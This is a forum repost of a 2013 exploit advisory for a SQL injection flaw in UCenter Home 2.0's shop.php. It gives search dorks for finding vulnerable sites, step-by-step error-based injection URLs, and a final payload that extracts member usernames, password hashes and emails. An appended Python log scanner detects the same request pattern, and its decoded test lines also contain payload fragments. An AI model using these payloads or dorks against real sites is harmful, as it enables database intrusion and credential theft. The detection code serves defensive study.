中国网络渗透测试联盟
Title:
UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
Author:
admin
Time:
2013-2-27 21:31
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerability Type : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim's database name.
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..
DB : Okey.
You edit DB `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okey.
You use hex conversion and edit your SQL injection exploit.
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
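
A log check for the request pattern this advisory describes, added here as an example and not part of the original post or of UCenter Home. It flags requests to shop.php whose `shopid` is not a plain integer and labels the error-based markers seen in the advisory's queries; the function names, the combined log format, the sample lines and the integer-only rule for `shopid` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access-log lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Feb/2013:21:31:02 +0800] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [27/Feb/2013:21:32:10 +0800] "GET /shop.php?ac=view&shopid=253%20and(select%201'
    '%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.9 - - [27/Feb/2013:21:33:40 +0800] "GET /shop.php?ac=view&shopid=253%2520AND%2520(SELECT%25201) HTTP/1.1" 200 801',
    '198.51.100.7 - - [27/Feb/2013:21:35:00 +0800] "GET /space.php?uid=12 HTTP/1.1" 200 2048',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Markers of the error-based technique in the advisory, checked after decoding.
SIGNATURES = {
    "rand-group-by": re.compile(r"floor\s*\(\s*rand\s*\(.*group\s+by", re.I | re.S),
    "information_schema": re.compile(r"information_schema", re.I),
    "subquery": re.compile(r"\bselect\b", re.I),
}

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so double-encoded payloads are still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (client, decoded shopid, matched signatures) for suspicious requests."""
    alerts = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/shop.php"):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
            value = fully_decode(raw)
            if re.fullmatch(r"[0-9]{1,10}", value):
                continue  # assumption: a legitimate shopid is a plain integer
            hits = [n for n, rx in SIGNATURES.items() if rx.search(value)]
            alerts.append((client, value, hits or ["non-numeric"]))
    return alerts
```

The integer allowlist catches every variant regardless of wording, so the signature labels serve only for triage; enforcing the same allowlist server-side before the query is built closes the hole itself.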
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)